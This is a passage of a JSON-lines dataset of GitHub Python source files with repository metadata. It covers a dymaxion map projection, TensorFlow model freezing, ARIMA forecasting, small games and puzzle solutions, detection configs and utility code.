ipdb.set_trace()\n\n self.projection = 'simple' # 'simple', 'predistort'\n\n def _init_from_name(self, polyhedron, mat=None):\n # TODO: also accept an \"unfolder\" which might be a class satisfying a certain interface:\n if polyhedron in ['icosahedron', '20', 'icosa']:\n pv, pe, pf = icosahedron(circumradius=1)\n self.face_transform = icosahedron_face_transform\n elif polyhedron in ['truncated-icosahedron', '32', 'soccerball']:\n pv, pe, pf = truncated_icosahedron(circumradius=1)\n self.face_transform = truncated_icosahedron_face_transform\n else:\n raise ValueError\n\n if mat is not None:\n pv = pv @ mat\n\n self._init_from_data(pv, pe, pf)\n\n self._init_2d()\n\n def _init_from_data(self, vertices, edges, faces):\n # set verts, edges, faces\n # calculate simple geometry values based on v, e, f\n self.vertices = vertices\n self.edges = edges\n self.faces = faces\n\n self.face_centers = np.array([np.mean(vertices[f], axis=0) for f in self.faces])\n self.face_center_mags = np.linalg.norm(self.face_centers, axis=1)\n self.face_unit_normals = self.face_centers / self.face_center_mags[:,None]\n\n def _init_2d(self):\n # calculate some linear transform values, and cache them.\n # these are used for:\n # 1. rotating the 3d faces (and shapes projected onto them) into the XY plane\n # 2. rotating and translating the results of (1) into the proper unfolded-polyhedron position\n # note that these are currently only used internally by project_simple_closed,\n # but they can be applied externally to the 3d results of any of the other\n # projection methods. project_simple_closed depends on the 2d intersection functions\n # of the Shapely library, so it has to operate in the 2d plane, whereas the other\n # projection methods produce 3d results.\n self.face_vertices_2d = {}\n self.face_transforms_3d = {}\n self.face_transforms_2d = {}\n\n for face_id in range(len(self.faces)):\n fn = self.face_unit_normals[face_id] # face normal\n fv = self.vertices[self.faces[face_id]] # face vertices\n M3 = rotation_matrix_from_src_dest_vecs(fn, [0, 0, 1]) # rotation matrix to bring face into xy plane\n fv2 = fv @ M3.T # 3d face vertices rotated to xy plane\n fx, fy, fr = self.face_transform(face_id, fv2) # 2d transformation parameters\n c, s = np.cos(fr), np.sin(fr)\n M2 = np.array([[c, -s], [s, c]]) # build 2d rotation matrix\n fv2_oriented = fv2[:, 0:2] @ M2 + [fx, fy] # apply 2d transform to face\n\n self.face_vertices_2d[face_id] = fv2_oriented\n self.face_transforms_3d[face_id] = M3\n self.face_transforms_2d[face_id] = (M2, [fx, fy])\n\n def set_projection(self, pstring):\n self.projection = pstring\n\n def project(self, xyz):\n if self.projection == 'simple':\n if len(self.faces) in [4, 6, 8, 12, 20]:\n return self.project_simple_platonic(xyz)\n else:\n return self.project_simple_archimedean(xyz)\n if self.projection == 'predistort-90':\n return self.project_predistort_90(xyz)\n if self.projection == 'predistort-45':\n return self.project_predistort_45(xyz)\n\n def project_simple_closed(self, xyz, face_id):\n # project a shape onto a single, specified face,\n # but return a closed shape rather than an open one,\n # in the case when the shape extends beyond the face.\n #\n # this requires \"clipping\", i.e. computing the intersection of\n # the face polygon with the shape polygon, which is nontrivial.\n #\n # several approaches are generally possible:\n #\n # 1. project entire shape onto the face, then compute planar intersection.\n # doesn't work because some shapes span too much of the globe, so the\n # projection explodes\n # 2. compute intersection of spherical polygons.\n # haven't yet found a decent library to do this, not worth\n # implementing myself unless necessary\n # 3. compute planar intersection within some proper azimuthal projection\n #\n # 3b. use some ad-hoc azimuthal projection that works well enough\n\n # given a face_id, get the corresponding face and:\n # - 3d-rotate it and its corresponding shapes onto XY plane,\n # - use the face_transform function to adjust the layout within the XY plane\n # - compute intersection of face with shapes, to clip them properly.\n\n # given the shape path `xyz`:\n # - project it from its sphere-surface xyz 3d points to an intermediate projection\n # this retains the shape as is, in the vicinity of the face, but condenses the rest of it,\n # so that the polyhedron-face projection doesn't blow up\n # - project the intermediate projection onto the (single known face of the) polyhedron\n # - transform the fully-projected shape to the xy plane, in correct poly-net orientation\n # - compute intersection of shape and face\n\n\n projected = {}\n\n fn = self.face_unit_normals[face_id] # face normal\n M3 = self.face_transforms_3d[face_id] # rotation matrix to bring face into xy plane\n M2, dxy = self.face_transforms_2d[face_id] # transform for bringing face/shape to final position+orientation\n fv2 = self.face_vertices_2d[face_id]\n poly_face = Polygon(fv2)\n\n def poly_intersection(face, shape):\n geometry_error = False\n\n clipped = None\n try:\n clipped = shape.intersection(face)\n except Exception as exc:\n print(' invalid geometry')\n geometry_error = True\n\n paths = []\n if type(clipped) == Polygon:\n # convert single polygon to multipolygon\n clipped = MultiPolygon([clipped])\n\n if type(clipped) == MultiPolygon:\n for poly in clipped:\n paths.append(np.vstack(poly.exterior.coords.xy).T)\n\n return paths, geometry_error\n\n\n # the same sequence of operations is done on both the original shape and the \"warped\" shape\n # because geometry flaws can break either (or both) of the resulting intersections\n proj3d = self.project_simple_archimedean_face(xyz, face_id)\n proj2d = proj3d @ M3.T\n proj2d_oriented = proj2d[:, 0:2] @ M2 + dxy\n poly_shape = Polygon(proj2d_oriented)\n\n\n warped = azimuthal_warp_projection(xyz, fn)\n\n proj3d_warped = self.project_simple_archimedean_face(warped, face_id)\n proj2d_warped = proj3d_warped @ M3.T\n proj2d_warped_oriented = proj2d_warped[:, 0:2] @ M2 + dxy\n poly_shape_warped = Polygon(proj2d_warped_oriented)\n\n projected['unwarped'], gerror_unwarped = poly_intersection(poly_face, poly_shape)\n projected['warped'], gerror_warped = poly_intersection(poly_face, poly_shape_warped)\n\n if not gerror_unwarped:\n projected['final'] = projected['unwarped']\n elif not gerror_warped:\n projected['final'] = projected['warped']\n else:\n projected['final'] = []\n # known to happen on face 5, with antarctica's \"main\" section\n import matplotlib.pyplot as plt\n plt.plot(proj2d_oriented[:,0], proj2d_oriented[:,1],'r')\n plt.plot(fv2[:,0], fv2[:,1],'g')\n import ipdb; ipdb.set_trace()\n\n return projected\n\n def project_predistort_90(self, xyz):\n # plot shapes projected onto polyhedron of nonzero thickness,\n # but in such a way that after sanding the polyhedron to a sphere,\n # the shapes match what they should be for the sphere.\n # the \"90\" refers to using an end mill (90 degrees from the plane)\n # to cut out the shapes, which means the extrusion of the shapes\n # through the thick face is perpendicular to the face.\n #\n # specifically: for each point `pt` in path,\n # 1. project onto insphere (call this `pts`)\n # 2. find intersection of\n # a) line through pts, with direction vector = face_normal\n # b) plane of the face\n\n\n R_ci = 1.258408572364819 # ratio of icosahedron circumradius/inradius\n # gives insphere radius relative to vertex magnitude\n print('WARNING: project_predistort_90 is not implemented generically') # TODO\n\n pxyz = []\n best_faces = []\n for pt in xyz:\n face_axis_angles = np.arccos(np.sum(pt/np.linalg.norm(pt) * self.face_unit_normals, axis=1))\n best_face_id = np.argmin(face_axis_angles)\n best_faces.append(best_face_id)\n\n fc = self.face_centers[best_face_id] # arbitrary point on plane\n fn = self.face_unit_normals[best_face_id] # normal to plane\n\n # project pt onto insphere first...\n pts = np.linalg.norm(self.vertices[0])/R_ci * pt/np.linalg.norm(pt)\n\n # ...then project that point, through a line perpendicular to the face,\n # onto the face\n s = np.dot(fc-pts, fn) / np.dot(fn, fn)\n projected = pts + fn * s\n\n # TODO - why are paths that cross polyhedron edges no longer contiguous\n # that might be expected... hard to be sure\n\n \"\"\"\n (p-fc).fn = 0 # (p-p0).n = 0\n p = pt + fn*d # p = l0 + l*d\n ((pt + fn*d)-fc).fn = 0 # ((l0+l*d)-p0).n = 0\n (pt + fn*d - fc).fn = 0\n pt.fn + d*fn.fn - fc.fn = 0\n d*fn.fn = fc.fn - pt.fn\n d = (fc-pt).fn/(fn.fn)\n p = pt + fn*d\n p = pt + fn * (fc-pt).fn/(fn.fn)\n \"\"\"\n\n pxyz.append(projected)\n\n return np.array(pxyz), best_faces\n\n def project_predistort_45(self, xyz):\n # similar concept to predistort_90, but here the \"45\" refers\n # to using a v-groove bit with a 45 angle off the plane,\n # so the exxtrusion of the shapes through the thick face is\n # at a 45-degree angle. should also be able to generalize this\n # to arbitrary other angles (but really just 30, 60)\n raise NotImplementedError\n\n def project_simple_archimedean_face(self, xyz, face_id):\n # project a shape entirely onto a single, specified face.\n # used when computing the proper 2D intersection of the shape\n # with the face polygon - only the points that get projected onto\n # the face should result from that intersection\n\n pxyz = []\n fc = self.face_centers[face_id] # arbitrary point on plane\n fn = self.face_unit_normals[face_id] # normal to plane\n num = np.dot(fc, fn)\n for pt in xyz:\n s = num/np.dot(pt, fn)\n # TODO if too far away from the face, then...?\n pxyz.append(pt * s)\n\n return np.array(pxyz)\n\n def project_simple_archimedean(self, xyz):\n # for each point in the shape:\n # - select corresponding face\n # - use equation of plane to project point onto polyhedron.\n # note this is a \"dymaxion projection\", which requires finding\n # the intersection of a ray and a plane, /not/ the projection of\n # that ray onto the plane, as you might mistakenly assume\n # thanks to the overloaded term \"projection\".\n\n # specifically: for each point `pt` in path,\n # find intersection of\n # a) line through `pt` with direction vector = `pt`\n # b) the plane of the face\n\n pxyz = []\n best_faces = []\n k = 2\n for pt in xyz:\n # figure out which face this point belongs to.\n #\n # instead of just choosing the smallest face_axis_angle, look at the\n # two smallest, find the corresponding point-on-face for both, and\n # choose the one that is closer to the centroid of the polyhedron.\n #\n # this is a quick and dirty solution to the problem that the method\n # of just choosing the smallest angle only works for platonic solids.\n # there may be a way that is more \"correct\", but this seems like it will\n # be about as fast as we can hope for?\n #\n # another idea: find a multiplicative factor to apply to the computed\n # angles, based on the size of the face. not sure if this makes sense.\n #\n # see project_simple_platonic for geometry explanation\n\n face_axis_angles = np.arccos(np.sum(pt/np.linalg.norm(pt) * self.face_unit_normals, axis=1))\n\n # argpartition sorts the input array, but only enough that the\n # first k values are in ascending order, which is all we need\n idxs = np.argpartition(face_axis_angles, k)\n\n min_rad = 10 * np.linalg.norm(self.vertices[0])\n min_projected = []\n\n for i in range(k):\n fc = self.face_centers[idxs[i]] # arbitrary point on plane\n fn = self.face_unit_normals[idxs[i]] # normal to plane\n s = np.dot(fc, fn)/np.dot(pt, fn)\n projected = pt * s\n rad = np.linalg.norm(projected)\n if rad < min_rad:\n min_rad = rad\n min_projected = projected\n best_face_id = idxs[i]\n\n best_faces.append(best_face_id)\n pxyz.append(min_projected)\n\n\n return np.array(pxyz), best_faces\n\n def project_simple_platonic(self, xyz):\n # for each point in the shape:\n # - find which face-line has smallest angle, select that plane\n # - use equation of plane to project point onto polyhedron.\n # note this is a \"dymaxion projection\", which requires finding\n # the intersection of a ray and a plane, /not/ the projection of\n # that ray onto the plane, as you might mistakenly assume\n # thanks to the overloaded term \"projection\".\n\n # specifically: for each point `pt` in path,\n # find intersection of\n # a) line through `pt` with direction vector = `pt`\n # b) the plane of the face\n\n pxyz = []\n best_faces = []\n for pt in xyz:\n # figure out which face this point belongs to\n face_axis_angles = np.arccos(np.sum(pt/np.linalg.norm(pt) * self.face_unit_normals, axis=1))\n best_face_id = np.argmin(face_axis_angles)\n best_faces.append(best_face_id)\n\n # find intersection of line (O, p) with plane with point fc and normal fn\n fc = self.face_centers[best_face_id] # arbitrary point on plane\n fn = self.face_unit_normals[best_face_id] # normal to plane\n s = np.dot(fc, fn)/np.dot(pt, fn)\n projected = pt * s\n\n \"\"\"\n https://en.wikipedia.org/wiki/Line%E2%80%93plane_intersection#Algebraic_form\n (p-fc).fn = 0 # (p-p0).n = 0\n p = 0 + pt*d # p = l0 + l*d\n ((pt*d)-fc).fn = 0 # ((l0+l*d)-p0).n = 0\n (pt*d).fn - fc.fn = 0\n d * pt.fn - fc.fn = 0\n d = fc.fn/pt.fn\n p = pt * d\n p = pt * fc.fn/pt.fn\n \"\"\"\n\n \"\"\"\n # project p onto the face\n vv = p - fc\n v_parallel = np.dot(vv, fn) / np.linalg.norm(fn) ** 2 * fn # component parallel to the normal\n v_perp = vv - v_parallel # component perpendicular to the normal\n projected = fc + v_perp\n \"\"\"\n\n pxyz.append(projected)\n\n return np.array(pxyz), best_faces\n\n\ndef azimuthal_warp_projection(xyz, c):\n # project Nx3 shape `xyz` to the plane with normal `c`, (TODO: what plane? what projection?)\n # using a goofy azimuthal projection that is identity under some limit,\n # and asymptotically approaches pi/2 above the limit. this maps the\n # entire sphere to the hemisphere centered on `c`, which simplifies computation\n # of intersections of oversized spherical polyhedra.\n\n x0, y0, y1 = np.pi * 0.14, np.pi * 0.14, np.pi*0.5 # limit for truncated icosahedron is tan(1/2.478) = pi*0.1350\n h, k, m = x0+y0-y1, y1, -(y1-y0)**2\n f = lambda x: (m + k*(x-h))/(x-h)\n # this is a piecewise, asymptotic function designed such that\n # f(x) = x for x < x0 (this case is handled outside of the lambda)\n # f(x0) = y0\n # f'(x0) = 1\n # f(inf) -> y1\n\n proj = []\n for pt in xyz:\n if np.linalg.norm(pt) < 1e-15:\n # dumb glitch\n continue\n\n # TODO: comment this\n a = np.arccos(np.dot(pt, c)/(np.linalg.norm(pt)*np.linalg.norm(c)))\n\n # TODO: comment this, separate into function\n # https://en.wikipedia.org/wiki/Slerp\n omega = np.arccos(np.dot(pt, c))\n #if omega == 0:\n # db()\n t = 1\n if a >= x0:\n t = f(a)/a\n v = np.sin((1-t)*omega)/np.sin(omega) * c + np.sin(t*omega)/np.sin(omega) * pt\n\n # TODO: comment this\n axis = np.cross(c, pt)\n proj.append(v)\n\n return np.array(proj)\n","repo_name":"alanbernstein/dymaxion","sub_path":"dymaxion.py","file_name":"dymaxion.py","file_ext":"py","file_size_in_byte":20734,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"30"} +{"seq_id":"42761666437","text":"import tensorflow as tf\nimport os.path\nimport ResNet_\nfrom tensorflow.python.framework import graph_util\nimport tensorflow.contrib.slim.python.slim.nets.vgg as vgg\nimport tensorflow.contrib.slim as slim\nimport SqueezeNet\n\nlabels_nums = 5 # 类别个数\nbatch_size = 32 #\nresize_height = 224 # mobilenet_v1.default_image_size 指定存储图片高度\nresize_width = 224 # mobilenet_v1.default_image_size 指定存储图片宽度\ndepths = 3\ndata_shape = [batch_size, resize_height, resize_width, depths]\n\ninput_images = tf.placeholder(dtype=tf.float32, shape=[None, resize_height, resize_width, depths], name='input')\n\n# 定义input_labels为labels数据\ninput_labels = tf.placeholder(dtype=tf.int32, shape=[None, labels_nums], name='label')\n\n\ndef load_variables_from_checkpoint(sess, start_checkpoint):\n \"\"\"Utility function to centralize checkpoint restoration.\n\n Args:\n sess: TensorFlow session.\n start_checkpoint: Path to saved checkpoint on disk.\n \"\"\"\n saver = tf.train.Saver(tf.global_variables())\n saver.restore(sess, start_checkpoint)\n\n\ndef main():\n # ckpt_path = 'models/resnet18_x3_old/best_models.ckpt'\n ckpt_path = './models/SqueezeNet_07/best_models.ckpt'\n init = tf.global_variables_initializer()\n with tf.Session() as sess:\n sess.run(init)\n # out = ResNet_.resnet_v1_18_(inputs=input_images, num_classes=labels_nums, is_training=False)\n # with slim.arg_scope(vgg.vgg_arg_scope()):\n # out, end_points = vgg.vgg_16(inputs=input_images, num_classes=labels_nums, is_training=False)\n out = SqueezeNet.SqueezeNet(inputs=input_images, num_classes=labels_nums)\n score = tf.nn.softmax(out, name='output')\n # tf.contrib.quantize.create_eval_graph()\n load_variables_from_checkpoint(sess, ckpt_path)\n # Turn all the variables into inline constants inside the graph and save it.\n frozen_graph_def = graph_util.convert_variables_to_constants(\n sess, sess.graph_def, ['output'])\n tf.train.write_graph(\n frozen_graph_def,\n os.path.dirname('SqueezeNet.pb'),\n os.path.basename('SqueezeNet.pb'),\n as_text=False)\n tf.logging.info('Saved frozen graph to %s', 'mnist_frozen_graph.pb')\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"wzlj/Learning","sub_path":"others/convert_frozen_graph.py","file_name":"convert_frozen_graph.py","file_ext":"py","file_size_in_byte":2301,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"30"} +{"seq_id":"71942411284","text":"#This code will perform time series forecasting using the ARIMA model from the statsmodels library. \n# The time series data is loaded into a pandas dataframe and plotted. \n# The data is then split into a training set and a test set. \n# The ARIMA model is fit to the training data and used to make predictions on the test data.\n# The actual and predicted values are plotted, \n# and the mean squared error is calculated to evaluate the accuracy of the predictions.\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom statsmodels.tsa.arima.model import ARIMA\nfrom sklearn.metrics import mean_squared_error\n\n# Load the data into a pandas dataframe\ndf = pd.read_csv('time_series_data.csv', index_col='date', parse_dates=True)\n\n# Plot the time series data\ndf.plot()\nplt.show()\n\n# Create a train and test split\ntrain = df[:int(0.8*(len(df)))]\ntest = df[int(0.8*(len(df))):]\n\n# Fit an ARIMA model\nmodel = ARIMA(train, order=(1, 1, 1))\nmodel_fit = model.fit()\n\n# Make predictions\npredictions = model_fit.forecast(steps=len(test))[0]\n\n# Plot the actual vs predicted values\nplt.plot(test.values)\nplt.plot(predictions)\nplt.show()\n\n# Calculate the mean squared error\nmse = mean_squared_error(test.values, predictions)\nprint(\"Mean Squared Error: \", mse)\n","repo_name":"asadiko/resume-projects","sub_path":"Machine learning projects/Time Series Forecasting.py","file_name":"Time Series Forecasting.py","file_ext":"py","file_size_in_byte":1264,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"30"} +{"seq_id":"4102616496","text":"from turtle import Turtle\n\nALIGNMENT = \"center\"\nFONT = (\"Courier\", 20, \"bold\")\n\nclass ScoreBoard(Turtle):\n \n def __init__(self) -> None:\n super().__init__()\n self.level = 1\n self.penup()\n self.color(\"black\")\n self.goto(-220,260)\n self.update_score_board()\n self.hideturtle()\n \n def update_score_board(self) -> None:\n self.clear()\n self.write(f\"Level: {self.level}\", font= FONT, align= ALIGNMENT)\n \n def game_over(self) -> None:\n self.goto(0, 0)\n self.write(f\"Game Over\", font= FONT, align= ALIGNMENT)\n \n def increase_level(self) -> None:\n self.clear()\n self.level += 1\n self.color(\"black\")\n self.update_score_board()","repo_name":"lior-eng/100-days-Python","sub_path":"Days-1-24/Turtle Crossing Capstone/scoreboard.py","file_name":"scoreboard.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"74581967443","text":"class Solution1:\n def permuteUnique(nums):\n permutations = [[]]\n for head in nums:\n permutations = [rest[:i] + [head] + rest[i:] for rest in permutations for i in\n range((rest + [head]).index(head) + 1)]\n return permutations\n\n\nclass Solution2:\n def permuteUnique(self, nums):\n ans = [[]]\n for n in nums:\n new_ans = []\n for l in ans:\n for i in range(len(l) + 1):\n new_ans.append(l[:i] + [n] + l[i:])\n if i < len(l) and l[i] == n:\n break\n ans = new_ans\n return ans\n","repo_name":"huangyingw/submissions","sub_path":"47/47.permutations-ii.234543289.Runtime-Error.leetcode.py","file_name":"47.permutations-ii.234543289.Runtime-Error.leetcode.py","file_ext":"py","file_size_in_byte":658,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"14905696931","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2018/11/19\n# @Author : Luke\n# @File : idsw.ml.train.py\n# @Desc : Scripts for initializing binary classification models. 机器学习->模型训练\nimport utils\nimport logging\nimport logging.config\nlogging.config.fileConfig('logging.ini')\n\n\nclass TrainModel:\n def __init__(self, args, args2):\n \"\"\"\n Standalone version for training model\n @param args: dict\n featureCols: list\n labelCol: String\n \"\"\"\n self.logger = logging.getLogger(self.__class__.__name__)\n\n self.originalDF = None\n self.inputUrl1 = args[\"input\"][0][\"value\"]\n self.inputUrl2 = args[\"input\"][1][\"value\"]\n self.outputUrl1 = args[\"output\"][0][\"value\"]\n self.param = args[\"param\"]\n self.model = None\n self.dataUtil = utils.dataUtil(args2)\n\n def getIn(self):\n # 训练sklearn等模型\n self.logger.debug(\"using standalone model\")\n # self.originalDF = data.PyReadCSV(self.inputUrl2)\n self.originalDF = self.dataUtil.PyReadHive(self.inputUrl2)\n self.model = self.dataUtil.PyReadModel(self.inputUrl1)\n\n def execute(self):\n featureCols = self.param[\"features\"]\n labelCol = self.param[\"label\"]\n\n # 训练sklearn等模型\n import sklearn.cluster\n if (not isinstance(self.model, sklearn.cluster.k_means_.KMeans)) & (\n not isinstance(self.model, sklearn.cluster.dbscan_.DBSCAN)):\n\n if \"binary\" in self.inputUrl1:\n self.logger.info(\"training binary classification model\")\n if len(self.originalDF[labelCol].unique()) != 2:\n self.logger.error(\"training data has more than 2 classes. Exiting...\")\n import sys\n sys.exit(0)\n else:\n self.model.fit(self.originalDF[featureCols], self.originalDF[labelCol])\n\n elif \"multi\" in self.inputUrl1:\n self.logger.info(\"training multi-class classification model\")\n self.model.fit(self.originalDF[featureCols], self.originalDF[labelCol])\n\n elif \"reg\" in self.inputUrl1:\n self.logger.info(\"training regression model\")\n self.model.fit(self.originalDF[featureCols], self.originalDF[labelCol])\n\n else:\n self.logger.error(\"not supported\")\n import sys\n sys.exit(0)\n else:\n self.logger.error(\"not supported\")\n import sys\n sys.exit(0)\n\n def setOut(self):\n self.logger.info(\"saving trained standalone model to %s\" % self.outputUrl1)\n self.dataUtil.PyWriteModel(self.model, self.outputUrl1)\n\n\nclass TrainClustering:\n def __init__(self, args, args2):\n \"\"\"\n Standalone version for training clustering model\n @param args: dict\n featureCols: list\n \"\"\"\n self.logger = logging.getLogger(self.__class__.__name__)\n\n self.originalDF = None\n self.transformDF = None\n self.inputUrl1 = args[\"input\"][0][\"value\"]\n self.inputUrl2 = args[\"input\"][1][\"value\"]\n self.outputUrl1 = args[\"output\"][0][\"value\"]\n self.outputUrl2 = args[\"output\"][1][\"value\"]\n self.param = args[\"param\"]\n self.model = None\n self.dataUtil = utils.dataUtil(args2)\n\n def getIn(self):\n # 训练sklearn等聚类模型\n self.logger.debug(\"using scikit-learn\")\n\n # self.originalDF = data.PyReadCSV(self.inputUrl2)\n self.originalDF = self.dataUtil.PyReadHive(self.inputUrl2)\n self.transformDF = self.originalDF.copy()\n self.model = self.dataUtil.PyReadModel(self.inputUrl1)\n\n def execute(self):\n featureCols = self.param[\"features\"]\n\n # 训练sklearn等聚类模型\n if \"cluster\" in self.inputUrl1:\n self.logger.info(\"training clustering model\")\n self.model.fit(self.originalDF[featureCols])\n self.transformDF[\"prediction\"] = self.model.labels_\n\n def setOut(self):\n self.logger.info(\"saving trained standalone clustering model to %s\" % self.outputUrl1)\n self.dataUtil.PyWriteModel(self.model, self.outputUrl1)\n self.dataUtil.PyWriteHive(self.transformDF, self.outputUrl2)\n\n\nclass TuneHyperparameter:\n pass\n","repo_name":"PetraWang/idsw-python","sub_path":"idsw/ml/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"15447613406","text":"# dataset settings\ndataset_type = 'CocoDataset'\n# data_root = 'data/coco/'\nclasses = ('pedestrian','people','bicycle','car','van','truck','tricycle','awning-tricycle','bus','motor')\ndata_root = 'data/VisDrone/'\nfold = 1\npercent = 10\nimg_norm_cfg = dict(\n mean=[123.675, 116.28, 103.53], std=[58.395, 57.12, 57.375], to_rgb=True)\ntrain_pipeline = [\n dict(type='LoadImageFromFile'),\n dict(type='LoadAnnotations', with_bbox=True),\n dict(type='Resize', img_scale=(1333, 800), keep_ratio=True),\n dict(type='RandomFlip', flip_ratio=0.5),\n dict(type='Normalize', **img_norm_cfg),\n dict(type='Pad', size_divisor=32),\n dict(type='DefaultFormatBundle'),\n dict(type='Collect', keys=['img', 'gt_bboxes', 'gt_labels']),\n]\ntest_pipeline = [\n dict(type='LoadImageFromFile'),\n dict(\n type='MultiScaleFlipAug',\n img_scale=(1333, 800),\n flip=False,\n transforms=[\n dict(type='Resize', keep_ratio=True),\n dict(type='RandomFlip'),\n dict(type='Normalize', **img_norm_cfg),\n dict(type='Pad', size_divisor=32),\n dict(type='ImageToTensor', keys=['img']),\n dict(type='Collect', keys=['img']),\n ])\n]\ndata = dict(\n samples_per_gpu=4,\n workers_per_gpu=4,\n train=dict(\n type=\"CocoDataset\",\n classes = classes,\n ann_file=\"data/VisDrone/annotations/train.json\",\n img_prefix=\"data/VisDrone/VisDrone2019-DET-train/images/\",\n pipeline=train_pipeline\n ),\n val=dict(\n type=\"CocoDataset\",\n classes=classes,\n ann_file=data_root + 'annotations/val.json',\n img_prefix=data_root + 'VisDrone2019-DET-val/images/',\n pipeline=test_pipeline\n ),\n test=dict(\n type=\"CocoDataset\",\n classes=classes,\n ann_file=data_root + 'annotations/val.json',\n img_prefix=data_root + 'VisDrone2019-DET-val/images/',\n pipeline=test_pipeline\n )\n)\nevaluation = dict(interval=1, metric='bbox')\n\n\nwork_dir = \"work_dirs/Gaussian-FRCNN\"\n# log_config = dict(\n# interval=50,\n# hooks=[\n# dict(type=\"TextLoggerHook\"),\n# dict(\n# type=\"WandbLoggerHook\",\n# init_kwargs=dict(\n# project=\"pre_release\",\n# name=\"${cfg_name}\",\n# config=dict(\n# fold=\"${fold}\",\n# percent=\"${percent}\",\n# work_dirs=\"${work_dir}\",\n# total_step=\"${runner.max_iters}\",\n# ),\n# ),\n# by_epoch=False,\n# ),\n# ],\n# )\n","repo_name":"saintrealchoi/Gaussian-Faster-R-CNN","sub_path":"configs/datasets/coco_detection.py","file_name":"coco_detection.py","file_ext":"py","file_size_in_byte":2609,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"30"} +{"seq_id":"5056460907","text":"import utils\n\n#DATA = 'data/day02/testdata'\nDATA = 'data/day02/realdata'\n\n# read in the list\n# split each line into string space number\n# start with [0,0]\n# when string is forward x + number\n# when string is down z + number\n# when string is up z - number\n\nsub_path = utils.load_string_data_split_on_space(DATA)\n\ndef calculate_position(data, i_x = 0, i_z = 0):\n# Initialise coordinates to starting values\n x = i_x\n z = i_z\n\n for line in data:\n if line[0] == 'forward':\n x = x + int(line[1])\n elif line[0] == 'down':\n z = z + int(line[1])\n elif line[0] == 'up':\n z = z - int(line[1])\n else:\n print('Error, incorrect data:', line[0])\n\n return x, z\n\ndef calculate_position_and_aim(data, i_x = 0, i_z = 0, i_aim = 0):\n# Initialise coordinates to starting values\n x = i_x\n z = i_z\n aim = i_aim\n\n for line in data:\n if line[0] == 'forward':\n x = x + int(line[1])\n z = z + (aim * int(line[1]))\n elif line[0] == 'down':\n aim = aim + int(line[1])\n elif line[0] == 'up':\n aim = aim - int(line[1])\n else:\n print('Error, incorrect data:', line[0])\n\n return x, z, aim\n\npart1 = calculate_position(sub_path)\npart2 = calculate_position_and_aim(sub_path)\n\n\nprint('The first answer is:', part1[0]*part1[1])\nprint('The second answer is:', part2[0]*part2[1])\n\n#######################################################################\nprint('OK to go!')\n","repo_name":"meridiani/AoC-2021","sub_path":"day02.py","file_name":"day02.py","file_ext":"py","file_size_in_byte":1516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"70676965204","text":"f = open('file.txt', 'r')\n\ns=f.read()\na=s.split('\\n')\n\ndef priority(letter):\n p = ord(letter)\n\n if(p<=90):\n return p-38\n else:\n return p-96\n\n\ntotal=0\n\n\nfor i in range(0, len(a), 3):\n #print(i)\n string1=a[i]\n string2=a[i+1]\n string3=a[i+2]\n\n #print(string2)\n \n for j in range(0, len(string1)):\n\n #if(j>len(string2) or j>len(string3)):\n #break\n #above 2 lines are wrong, because if length of string1 exceeds string2 and string3, it still might contain the badge(required letter)\n \n if(string2.find(string1[j])!=-1):\n if(string3.find(string1[j])!=-1):\n total+=priority(string1[j])\n break\n\n\nprint(total)\n","repo_name":"anubhavprabhakar/advent-of-code-2022","sub_path":"dec 3/dec 3 part 2 rucksack problem.py","file_name":"dec 3 part 2 rucksack problem.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"14505591712","text":"from sharpener import Benchmark\n\nfrom tests import config\nfrom bottomless_ReJSON import RedisInterface\n\n\n\nclass in_object(Benchmark):\n\n\tdef prepare(self, items_number):\n\n\t\tself.interface = RedisInterface(host=config['db']['host'], port=config['db']['port'])\n\t\tself.interface.clear()\n\t\tself.interface['sessions'] = {\n\t\t\tstr(i): {}\n\t\t\tfor i in range(items_number)\n\t\t}\n\n\tdef run(self, items_number):\n\t\tstr(items_number // 2) in self.interface\n\t\n\tdef clean(self, **kwargs):\n\t\tself.interface.clear()","repo_name":"MentalBlood/bottomless_ReJSON","sub_path":"benchmarks/benchmark_contains.py","file_name":"benchmark_contains.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"7258365708","text":"from PySide6 import QtCore\nfrom dataclasses import dataclass\n\n\ndef createThreadAndWorker(function, finished_slot, *args, **kwargs):\n thread = QtCore.QThread()\n worker = GenericWorker(function, *args, **kwargs)\n worker.moveToThread(thread)\n thread.started.connect(worker.run)\n worker.finished.connect(finished_slot)\n worker.finished.connect(thread.quit)\n worker.finished.connect(worker.deleteLater)\n thread.finished.connect(thread.deleteLater)\n thread.start()\n return thread, worker\n\n\n@dataclass\nclass RunnableReturn:\n id_: int\n value: object\n\n\nclass GenericRunnableSignals(QtCore.QObject):\n finished = QtCore.Signal(RunnableReturn)\n\n\nclass GenericRunnable(QtCore.QRunnable):\n def __init__(self, id_: int, function, *args, **kwargs) -> None:\n super().__init__()\n self._id_ = id_\n self._function = function\n self._args = args\n self._kwargs = kwargs\n\n self.signals = GenericRunnableSignals()\n\n def run(self):\n res = RunnableReturn(self._id_, None)\n try:\n res.value = self._function(*self._args, **self._kwargs)\n except Exception:\n pass\n self.signals.finished.emit(res)\n\n\nclass GenericWorker(QtCore.QObject):\n finished = QtCore.Signal(object)\n\n def __init__(\n self, function, *args, parent: QtCore.QObject | None = None, **kwargs\n ) -> None:\n super().__init__(parent)\n self.function = function\n self.args = args\n self.kwargs = kwargs\n\n 